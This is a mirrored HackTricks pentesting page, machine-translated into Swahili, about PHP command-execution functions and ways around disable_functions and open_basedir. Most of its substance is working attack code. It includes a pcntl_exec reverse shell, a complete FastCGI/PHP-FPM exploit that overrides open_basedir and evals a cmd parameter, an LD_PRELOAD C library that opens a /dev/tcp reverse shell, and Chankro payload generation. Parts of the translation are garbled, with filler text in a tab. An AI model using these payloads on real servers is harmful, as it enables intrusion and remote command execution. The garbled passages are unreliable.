Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-04 02:20:20 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass
History
Translator d17ec00ae9 Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:47:30 +00:00
..
disable_functions-bypass-dl-function.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-mod_cgi.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-5.2-fopen-exploit.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-7.0-7.4-nix-only.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-fpm-fastcgi.md Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00
disable_functions-bypass-php-less-than-5.2.9-on-windows.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-bypass-via-mem.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-php-5.2.4-ioncube-extension-exploit.md Translated to Swahili 2024-02-11 02:13:58 +00:00
disable_functions-php-5.x-shellshock-exploit.md Translated to Swahili 2024-02-11 02:13:58 +00:00
README.md Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:47:30 +00:00

README.md

PHP - Kazi za Kufaa & kufunga_functions/open_basedir kuvuka

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PHP Amri & Utekelezaji wa Kanuni

Utekelezaji wa Amri za PHP

Maelezo: p0wny-shell webshell ya php inaweza kiotomatiki kuangalia na kuvuka kazi zifuatazo ikiwa baadhi yao zimelemazwa.

exec - Inarudisha mstari wa mwisho wa matokeo ya amri.

echo exec("uname  -a");

passthru - Inapitisha matokeo ya amri moja kwa moja kwenye kivinjari

echo passthru("uname -a");

system - Inapeleka matokeo ya amri moja kwa moja kwenye kivinjari na kurudisha mstari wa mwisho

echo system("uname -a");

shell_exec - Inarudisha matokeo ya amri

echo shell_exec("uname -a");

`` (backticks) - Sawa na shell_exec()

echo `uname -a`

popen - Inafungua mrija wa kusoma au kuandika kwa mchakato wa amri

echo fread(popen("/bin/ls /", "r"), 4096);

proc_open - Sawa na popen() lakini kiwango kikubwa cha udhibiti

proc_close(proc_open("uname -a",array(),$something));

preg_replace

<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

pcntl_exec - Inatekeleza programu (kwa chaguo-msingi katika PHP ya kisasa na isiyo ya kisasa unahitaji kupakia moduli ya pcntl.so ili kutumia kazi hii)

pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]);

barua pepe / mb_send_mail - Hii kazi hutumiwa kutuma barua pepe, lakini inaweza kutumiwa vibaya kuingiza amri za kupendelea ndani ya $options parameter. Hii ni kwa sababu php mail function kawaida huita sendmail binary ndani ya mfumo na inakuruhusu kuweka chaguo za ziada. Walakini, hautaweza kuona matokeo ya amri iliyotekelezwa, kwa hivyo inashauriwa kuunda script ya shell ambayo inaandika matokeo kwenye faili, kuitekeleza kwa kutumia mail, na kuchapisha matokeo:

file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777);  mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt');

dl - Kazi hii inaweza kutumika kudhibitisha mzigo wa PHP kwa kudhibitisha kipanuzi. Kazi hii haitakuwepo kila wakati, hivyo unapaswa kuhakikisha kama ipo kabla ya kujaribu kuitumia. Soma ukurasa huu kujifunza jinsi ya kutumia kazi hii.

Utekelezaji wa Msimbo wa PHP

Mbali na eval kuna njia nyingine za kutekeleza msimbo wa PHP: include/require inaweza kutumika kwa utekelezaji wa msimbo wa PHP kwa njia ya udhaifu wa Kuingiza Faili za Ndani na Kuingiza Faili za Mbali.

${<php code>}              // If your input gets reflected in any PHP string, it will be executed.
eval()
assert()                   //  identical to eval()
preg_replace('/.*/e',...)  // e does an eval() on the match
create_function()          // Create a function and use eval()
include()
include_once()
require()
require_once()
$_GET['func_name']($_GET['argument']);

$func = new ReflectionFunction($_GET['func_name']);
$func->invoke();
// or
$func->invokeArgs(array());

// or serialize/unserialize function

disable_functions & open_basedir

Funguo zilizozimwa ni mipangilio inayoweza kusanidiwa katika faili za .ini katika PHP ambayo itazuia matumizi ya kazi zilizotajwa. Open basedir ni mipangilio inayoonyesha PHP folda ambayo inaweza kufikia.
Mipangilio ya PHP huzoeleka kusanidiwa katika njia /etc/php7/conf.d au sawa na hiyo.

Mipangilio yote inaweza kuonekana kwenye matokeo ya phpinfo():

open_basedir Bypass

open_basedir itasanidi folda ambazo PHP inaweza kufikia, hutaweza kuandika/kusoma/kutekeleza faili yoyote nje ya folda hizo, lakini pia hutaweza hata kuorodhesha mabano mengine.
Hata hivyo, ikiwa kwa namna fulani unaweza kutekeleza msimbo wa PHP kwa hiari unaweza jaribu kifungu kifuatacho cha mambo kujaribu kupita kizuizi.

Kuorodhesha mabano na kizuizi cha glob://

Katika mfano wa kwanza, itatumika itifaki ya glob:// na kizuizi cha njia fulani:

<?php
$file_list = array();
$it = new DirectoryIterator("glob:///v??/run/*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
$it = new DirectoryIterator("glob:///v??/run/.*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
echo "{$f}<br/>";
}

Note1: Katika njia unaweza pia kutumia /e??/* kuorodhesha /etc/* na folda nyingine yoyote.
Note2: Inaonekana kama sehemu ya nambari imejirudia, lakini hiyo ni muhimu!
Note3: Mfano huu ni muhimu tu kwa kuorodhesha folda si kusoma faili

Kukiuka kabisa open_basedir kwa kutumia FastCGI

Ikiwa unataka kujifunza zaidi kuhusu PHP-FPM na FastCGI unaweza kusoma sehemu ya kwanza ya ukurasa huu.
Ikiwa php-fpm imeboreshwa unaweza kuitumia kukiuka kabisa open_basedir:

Tafadhali kumbuka jambo la kwanza unalohitaji kufanya ni kupata socket ya unix ya php-fpm. Kawaida huwa chini ya /var/run hivyo unaweza kutumia nambari iliyotangulia kuorodhesha folda na kuipata.
Nambari kutoka hapa.

<?php
/**
* Note : Code is released under the GNU LGPL
*
* Please do not change the header of this file
*
* This library is free software; you can redistribute it and/or modify it under the terms of the GNU
* Lesser General Public License as published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* See the GNU Lesser General Public License for more details.
*/
/**
* Handles communication with a FastCGI application
*
* @author      Pierrick Charron <pierrick@webstart.fr>
* @version     1.0
*/
class FCGIClient
{
const VERSION_1            = 1;
const BEGIN_REQUEST        = 1;
const ABORT_REQUEST        = 2;
const END_REQUEST          = 3;
const PARAMS               = 4;
const STDIN                = 5;
const STDOUT               = 6;
const STDERR               = 7;
const DATA                 = 8;
const GET_VALUES           = 9;
const GET_VALUES_RESULT    = 10;
const UNKNOWN_TYPE         = 11;
const MAXTYPE              = self::UNKNOWN_TYPE;
const RESPONDER            = 1;
const AUTHORIZER           = 2;
const FILTER               = 3;
const REQUEST_COMPLETE     = 0;
const CANT_MPX_CONN        = 1;
const OVERLOADED           = 2;
const UNKNOWN_ROLE         = 3;
const MAX_CONNS            = 'MAX_CONNS';
const MAX_REQS             = 'MAX_REQS';
const MPXS_CONNS           = 'MPXS_CONNS';
const HEADER_LEN           = 8;
/**
* Socket
* @var Resource
*/
private $_sock = null;
/**
* Host
* @var String
*/
private $_host = null;
/**
* Port
* @var Integer
*/
private $_port = null;
/**
* Keep Alive
* @var Boolean
*/
private $_keepAlive = false;
/**
* Constructor
*
* @param String $host Host of the FastCGI application
* @param Integer $port Port of the FastCGI application
*/
public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
{
$this->_host = $host;
$this->_port = $port;
}
/**
* Define whether or not the FastCGI application should keep the connection
* alive at the end of a request
*
* @param Boolean $b true if the connection should stay alive, false otherwise
*/
public function setKeepAlive($b)
{
$this->_keepAlive = (boolean)$b;
if (!$this->_keepAlive && $this->_sock) {
fclose($this->_sock);
}
}
/**
* Get the keep alive status
*
* @return Boolean true if the connection should stay alive, false otherwise
*/
public function getKeepAlive()
{
return $this->_keepAlive;
}
/**
* Create a connection to the FastCGI application
*/
private function connect()
{
if (!$this->_sock) {
//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
if (!$this->_sock) {
throw new Exception('Unable to connect to FastCGI application');
}
}
}
/**
* Build a FastCGI packet
*
* @param Integer $type Type of the packet
* @param String $content Content of the packet
* @param Integer $requestId RequestId
*/
private function buildPacket($type, $content, $requestId = 1)
{
$clen = strlen($content);
return chr(self::VERSION_1)         /* version */
. chr($type)                    /* type */
. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
. chr($requestId & 0xFF)        /* requestIdB0 */
. chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
. chr($clen & 0xFF)             /* contentLengthB0 */
. chr(0)                        /* paddingLength */
. chr(0)                        /* reserved */
. $content;                     /* content */
}
/**
* Build an FastCGI Name value pair
*
* @param String $name Name
* @param String $value Value
* @return String FastCGI Name value pair
*/
private function buildNvpair($name, $value)
{
$nlen = strlen($name);
$vlen = strlen($value);
if ($nlen < 128) {
/* nameLengthB0 */
$nvpair = chr($nlen);
} else {
/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
}
if ($vlen < 128) {
/* valueLengthB0 */
$nvpair .= chr($vlen);
} else {
/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
}
/* nameData & valueData */
return $nvpair . $name . $value;
}
/**
* Read a set of FastCGI Name value pairs
*
* @param String $data Data containing the set of FastCGI NVPair
* @return array of NVPair
*/
private function readNvpair($data, $length = null)
{
$array = array();
if ($length === null) {
$length = strlen($data);
}
$p = 0;
while ($p != $length) {
$nlen = ord($data{$p++});
if ($nlen >= 128) {
$nlen = ($nlen & 0x7F << 24);
$nlen |= (ord($data{$p++}) << 16);
$nlen |= (ord($data{$p++}) << 8);
$nlen |= (ord($data{$p++}));
}
$vlen = ord($data{$p++});
if ($vlen >= 128) {
$vlen = ($nlen & 0x7F << 24);
$vlen |= (ord($data{$p++}) << 16);
$vlen |= (ord($data{$p++}) << 8);
$vlen |= (ord($data{$p++}));
}
$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
$p += ($nlen + $vlen);
}
return $array;
}
/**
* Decode a FastCGI Packet
*
* @param String $data String containing all the packet
* @return array
*/
private function decodePacketHeader($data)
{
$ret = array();
$ret['version']       = ord($data{0});
$ret['type']          = ord($data{1});
$ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
$ret['paddingLength'] = ord($data{6});
$ret['reserved']      = ord($data{7});
return $ret;
}
/**
* Read a FastCGI Packet
*
* @return array
*/
private function readPacket()
{
if ($packet = fread($this->_sock, self::HEADER_LEN)) {
$resp = $this->decodePacketHeader($packet);
$resp['content'] = '';
if ($resp['contentLength']) {
$len  = $resp['contentLength'];
while ($len && $buf=fread($this->_sock, $len)) {
$len -= strlen($buf);
$resp['content'] .= $buf;
}
}
if ($resp['paddingLength']) {
$buf=fread($this->_sock, $resp['paddingLength']);
}
return $resp;
} else {
return false;
}
}
/**
* Get Informations on the FastCGI application
*
* @param array $requestedInfo information to retrieve
* @return array
*/
public function getValues(array $requestedInfo)
{
$this->connect();
$request = '';
foreach ($requestedInfo as $info) {
$request .= $this->buildNvpair($info, '');
}
fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
$resp = $this->readPacket();
if ($resp['type'] == self::GET_VALUES_RESULT) {
return $this->readNvpair($resp['content'], $resp['length']);
} else {
throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
}
}
/**
* Execute a request to the FastCGI application
*
* @param array $params Array of parameters
* @param String $stdin Content
```php
* @return String
*/
public function request(array $params, $stdin)
{
$response = '';
$this->connect();
$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
$paramsRequest = '';
foreach ($params as $key => $value) {
$paramsRequest .= $this->buildNvpair($key, $value);
}
if ($paramsRequest) {
$request .= $this->buildPacket(self::PARAMS, $paramsRequest);
}
$request .= $this->buildPacket(self::PARAMS, '');
if ($stdin) {
$request .= $this->buildPacket(self::STDIN, $stdin);
}
$request .= $this->buildPacket(self::STDIN, '');
fwrite($this->_sock, $request);
do {
$resp = $this->readPacket();
if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
$response .= $resp['content'];
}
} while ($resp && $resp['type'] != self::END_REQUEST);
var_dump($resp);
if (!is_array($resp)) {
throw new Exception('Bad request');
}
switch (ord($resp['content']{4})) {
case self::CANT_MPX_CONN:
throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
break;
case self::OVERLOADED:
throw new Exception('New request rejected; too busy [OVERLOADED]');
break;
case self::UNKNOWN_ROLE:
throw new Exception('Role value not known [UNKNOWN_ROLE]');
break;
case self::REQUEST_COMPLETE:
return $response;
}
}
}
?>
<?php
// real exploit start here
if (!isset($_REQUEST['cmd'])) {
die("Check your input\n");
}
if (!isset($_REQUEST['filepath'])) {
$filepath = __FILE__;
}else{
$filepath = $_REQUEST['filepath'];
}
$req = '/'.basename($filepath);
$uri = $req .'?'.'command='.$_REQUEST['cmd'];
$client = new FCGIClient("unix:///var/run/php-fpm.sock", -1);
$code = "<?php eval(\$_REQUEST['command']);?>"; // php payload -- Doesnt do anything
$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
//$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
$params = array(
'GATEWAY_INTERFACE' => 'FastCGI/1.0',
'REQUEST_METHOD'    => 'POST',
'SCRIPT_FILENAME'   => $filepath,
'SCRIPT_NAME'       => $req,
'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
'REQUEST_URI'       => $uri,
'DOCUMENT_URI'      => $req,
#'DOCUMENT_ROOT'     => '/',
'PHP_VALUE'         => $php_value,
'SERVER_SOFTWARE'   => '80sec/wofeiwo',
'REMOTE_ADDR'       => '127.0.0.1',
'REMOTE_PORT'       => '9985',
'SERVER_ADDR'       => '127.0.0.1',
'SERVER_PORT'       => '80',
'SERVER_NAME'       => 'localhost',
'SERVER_PROTOCOL'   => 'HTTP/1.1',
'CONTENT_LENGTH'    => strlen($code)
);
// print_r($_REQUEST);
// print_r($params);
//echo "Call: $uri\n\n";
echo $client->request($params, $code)."\n";
?>

Hii scripts itawasiliana na unix socket ya php-fpm (kawaida iko katika /var/run ikiwa fpm inatumika) ili kutekeleza nambari ya kupindukia. Mipangilio ya open_basedir itafutwa na sifa ya PHP_VALUE inayotumwa.
Tafadhali kumbuka jinsi eval inavyotumika kutekeleza nambari ya PHP unayotuma ndani ya parameter ya cmd.
Pia kumbuka mstari uliokomentiwa 324, unaweza kuondoa maoni yake na payload itaunganisha moja kwa moja kwenye URL iliyotolewa na kutekeleza nambari ya PHP iliyomo hapo.
Fikia http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd'); kupata maudhui ya faili ya /etc/passwd.

{% hint style="warning" %} Unaweza kufikiria kwamba kwa njia ile ile tulivyofuta mazingira ya open_basedir tunaweza kufuta disable_functions. Vizuri, jaribu, lakini haitafanya kazi, kwa kwamba disable_functions inaonekana inaweza kusanidiwa tu katika faili ya usanidi ya php ya .ini na mabadiliko unayofanya ukitumia PHP_VALUE hayatakuwa na athari kwenye usanidi huu maalum. {% endhint %}

disable_functions Kupita

Ikiwa unaweza kuwa na nambari ya PHP inayotekelezwa ndani ya mashine labda unataka kwenda kwenye kiwango kinachofuata na kutekeleza amri za mfumo za kupindukia. Katika hali hii ni kawaida kugundua kuwa zaidi au vyote vya PHP functions vinavyoruhusu utekelezaji wa amri za mfumo vimelemazwa katika disable_functions.
Kwa hivyo, tuone jinsi unavyoweza kuzunguka kizuizi hiki (ikiwa unaweza)

Ugunduzi wa Kupita wa Kiotomatiki

Unaweza kutumia zana https://github.com/teambi0s/dfunc-bypasser na itakuonyesha ni kazi gani (ikiwa ipo) unaweza kutumia kuzunguka disable_functions.

Kuzunguka kwa kutumia functions nyingine za mfumo

Rudi mwanzoni mwa ukurasa huu na angalia ikiwa kuna function yoyote ya kutekeleza amri ambayo haijalemazwa na ipo kwenye mazingira. Ikiwa utapata moja tu, utaweza kutumia kutekeleza amri za mfumo za kupindukia.

Kupita kwa kutumia LD_PRELOAD

Inajulikana vizuri kwamba baadhi ya functions katika PHP kama mail() zitakuwa kutekeleza binaries ndani ya mfumo. Kwa hivyo, unaweza kuzitumia kwa kutumia mazingira ya variable ya LD_PRELOAD kufanya ziweke maktaba ya kupindukia inayoweza kutekeleza chochote.

Functions zinazoweza kutumika kuzunguka disable_functions na LD_PRELOAD

  • mail
  • mb_send_mail: Inafanya kazi wakati moduli ya php-mbstring imewekwa.
  • imap_mail: Inafanya kazi ikiwa moduli ya php-imap ipo.
  • libvirt_connect: Inahitaji moduli ya php-libvirt-php.
  • gnupg_init: Inaweza kutumika na moduli ya php-gnupg imewekwa.
  • new imagick(): Darasa hili linaweza kutumika kuzunguka vizuizi. Mbinu kamili za kutumia zinaweza kupatikana katika makala hii.

Unaweza kupata hapa script ya kufanya fujo iliyotumika kupata functions hizo.

Hapa kuna maktaba unayoweza kuchambua kutumia mazingira ya LD_PRELOAD:

#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>

uid_t getuid(void){
unsetenv("LD_PRELOAD");
system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
return 1;
}

Kupitisha kwa kutumia Chankro

Ili kutumia utata huu unaweza Chankro. Hii ni chombo ambacho kit zalisha shambulizi la PHP ambalo unahitaji kupakia kwenye seva yenye kasoro na kulitekeleza (ufikie kupitia wavuti).
Chankro itaandika kwenye diski ya waathiriwa maktaba na kifaa cha kubadilisha unachotaka kutekeleza na itatumia**LD_PRELOAD mbinu + PHP mail()** kazi kutumia kifaa cha kubadilisha.

Tafadhali kumbuka kwamba ili kutumia Chankro, mail na putenv hazipaswi kuonekana ndani ya orodha ya disable_functions.
Katika mfano ufuatao unaweza kuona jinsi ya kuunda shambulizi la chankro kwa arch 64, ambayo itatekeleza whoami na kuokoa pato katika /tmp/chankro_shell.out, chankro ita andika maktaba na mzigo katika /tmp na shambulizi la mwisho litaitwa bicho.php (hiyo ndiyo faili unayohitaji kupakia kwenye seva za waathiriwa):

{% tabs %} {% tab title="shell.sh" %}

#!/bin/sh
whoami > /tmp/chankro_shell.out

{% endtab %}

{% tab title="Chankro" %}

Chini ni orodha ya kazi za PHP ambazo zinaweza kusaidia katika kufanya shughuli za kawaida za uhandisi wa nyuma kwa njia ya kipekee. Kumbuka kwamba kazi hizi zinaweza kutumika kwa njia mbaya na zinaweza kusababisha hatari kwa usalama wa mfumo ikiwa hazitumiki kwa usahihi. Ni muhimu kuzingatia mazingira ya matumizi kabla ya kutumia kazi hizi.

disable_functions Bypass

Ikiwa kazi ya disable_functions imeamilishwa kwenye seva ya PHP, inazuia matumizi ya kazi fulani za PHP ambazo zimewekwa kwenye orodha ya kuzima. Hata hivyo, kuna njia za kuzunguka kizuizi hiki kwa kutumia mbinu mbalimbali kama vile kutumia kazi za kujenga faili, kutumia kazi za kufuta faili, au kutumia kazi za kusoma faili.

open_basedir Bypass

Kizuizi cha open_basedir kwenye PHP inazuia skripti kutoka kusoma faili nje ya eneo lililowekwa. Hata hivyo, kuna njia za kuzunguka kizuizi hiki kwa kutumia mbinu kama vile kutumia kazi za move_uploaded_file au kutumia kazi za file_get_contents kusoma faili zilizo nje ya eneo lililowekwa.

Kumbuka

Kabla ya kujaribu kuzunguka vikwazo kama disable_functions au open_basedir, ni muhimu kuhakikisha una idhini sahihi ya kufanya hivyo na kufuata sheria na kanuni zote zinazohusiana. Kukiuka sheria kunaweza kusababisha madhara makubwa ikiwa utagundulika.

{% endtab %}

python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php

{% endtab %} {% endtabs %}

Ikiwa unagundua kwamba kazi ya mail imezuiliwa na kazi zilizozimwa, bado unaweza kutumia kazi ya mb_send_mail.
Maelezo zaidi kuhusu mbinu hii na Chankro hapa: https://www.tarlogic.com/en/blog/how-to-bypass-disable_functions-and-open_basedir/

"Kupita" kwa kutumia uwezo wa PHP

Tafadhali kumbuka kwamba kwa kutumia PHP unaweza kusoma na kuandika faili, kuunda saraka na kubadilisha ruhusa.
Unaweza hata kudumpi databases.
Labda kwa kutumia PHP kwa kutambua sanduku unaweza kupata njia ya kuinua mamlaka/kutekeleza amri (kwa mfano kusoma funguo za ssh za faragha).

Nimeunda webshell ambayo inafanya iwe rahisi kutekeleza vitendo hivi (tambua kwamba webshells nyingi zitakupa chaguo hili pia): https://github.com/carlospolop/phpwebshelllimited

Mbinu za Kupita zinazotegemea Moduli/Toleo

Kuna njia kadhaa za kupita kazi za kulemaza ikiwa moduli fulani maalum inatumika au kutumia toleo fulani la PHP:

Zana ya Kiotomatiki

Skripti ifuatayo inajaribu baadhi ya mbinu zilizotajwa hapa:
https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/shell.php

Kazi Nyingine za PHP Zinazovutia

Orodha ya kazi ambazo zinakubali maingiliano

Kazi hizi hukubali parameter ya herufi ambayo inaweza kutumika kuita kazi ya uchaguzi wa mshambuliaji. Kulingana na kazi, mshambuliaji anaweza au hawezi kuwa na uwezo wa kupitisha parameter. Katika kesi hiyo, kazi ya Ufunuo wa Taarifa kama phpinfo() inaweza kutumika.

Callbacks / Callables

Orodha ifuatayo kutoka hapa

// Function => Position of callback arguments
'ob_start' => 0,
'array_diff_uassoc' => -1,
'array_diff_ukey' => -1,
'array_filter' => 1,
'array_intersect_uassoc' => -1,
'array_intersect_ukey' => -1,
'array_map' => 0,
'array_reduce' => 1,
'array_udiff_assoc' => -1,
'array_udiff_uassoc' => array(-1, -2),
'array_udiff' => -1,
'array_uintersect_assoc' => -1,
'array_uintersect_uassoc' => array(-1, -2),
'array_uintersect' => -1,
'array_walk_recursive' => 1,
'array_walk' => 1,
'assert_options' => 1,
'uasort' => 1,
'uksort' => 1,
'usort' => 1,
'preg_replace_callback' => 1,
'spl_autoload_register' => 0,
'iterator_apply' => 1,
'call_user_func' => 0,
'call_user_func_array' => 0,
'register_shutdown_function' => 0,
'register_tick_function' => 0,
'set_error_handler' => 0,
'set_exception_handler' => 0,
'session_set_save_handler' => array(0, 1, 2, 3, 4, 5),
'sqlite_create_aggregate' => array(2, 3),
'sqlite_create_function' => 2,

Kufichua Taarifa

Kitaalam, wito wa kazi hizi mara nyingi si tundu. Lakini badala yake inaweza kuwa mwanya ikiwa data yoyote inayorudiwa inaweza kuonekana na mshambuliaji. Ikiwa mshambuliaji anaweza kuona phpinfo() ni bila shaka mwanya.

phpinfo
posix_mkfifo
posix_getlogin
posix_ttyname
getenv
get_current_user
proc_get_status
get_cfg_var
disk_free_space
disk_total_space
diskfreespace
getcwd
getlastmo
getmygid
getmyinode
getmypid
getmyuid

Nyingine

extract    // Opens the door for register_globals attacks (see study in scarlet).
parse_str  // works like extract if only one argument is given.
putenv
ini_set
mail       // has CRLF injection in the 3rd parameter, opens the door for spam.
header     // on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area.
proc_nice
proc_terminate
proc_close
pfsockopen
fsockopen
apache_child_terminate
posix_kill
posix_mkfifo
posix_setpgid
posix_setsid
posix_setuid

Vipengele vya Mfumo wa Faili

Kulingana na RATS vipengele vyote vya mfumo wa faili katika php ni vichafu. Baadhi ya hivi havionekani kuwa vya manufaa kwa mshambuliaji. Vingine ni vya manufaa zaidi kuliko unavyoweza kufikiria. Kwa mfano, ikiwa allow_url_fopen=On basi url inaweza kutumika kama njia ya faili, hivyo wito wa copy($_GET['s'], $_GET['d']); unaweza kutumika kupakia skripti ya PHP popote kwenye mfumo. Pia ikiwa tovuti ina mapungufu ya ombi lililotumwa kupitia GET kila moja ya vipengele hivyo vya mfumo wa faili vinaweza kutumiwa vibaya kuelekeza na kushambulia mwenyeji mwingine kupitia seva yako.

Mfumo wa kushughulikia faili wazi

fopen
tmpfile
bzopen
gzopen
SplFileObject->__construct

Andika kwa mfumo wa faili (kwa sehemu katika mchanganyiko na kusoma)

chgrp
chmod
chown
copy
file_put_contents
lchgrp
lchown
link
mkdir
move_uploaded_file
rename
rmdir
symlink
tempnam
touch
unlink
imagepng     // 2nd parameter is a path.
imagewbmp    // 2nd parameter is a path.
image2wbmp   // 2nd parameter is a path.
imagejpeg    // 2nd parameter is a path.
imagexbm     // 2nd parameter is a path.
imagegif     // 2nd parameter is a path.
imagegd      // 2nd parameter is a path.
imagegd2     // 2nd parameter is a path.
iptcembed
ftp_get
ftp_nb_get
scandir

Soma kutoka kwenye mfumo wa faili

file_exists
-- file_get_contents
file
fileatime
filectime
filegroup
fileinode
filemtime
fileowner
fileperms
filesize
filetype
glob
is_dir
is_executable
is_file
is_link
is_readable
is_uploaded_file
is_writable
is_writeable
linkinfo
lstat
parse_ini_file
pathinfo
readfile
readlink
realpath
stat
gzfile
readgzfile
getimagesize
imagecreatefromgif
imagecreatefromjpeg
imagecreatefrompng
imagecreatefromwbmp
imagecreatefromxbm
imagecreatefromxpm
ftp_put
ftp_nb_put
exif_read_data
read_exif_data
exif_thumbnail
exif_imagetype
hash_file
hash_hmac_file
hash_update_file
md5_file
sha1_file
-- highlight_file
-- show_source
php_strip_whitespace
get_meta_tags
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: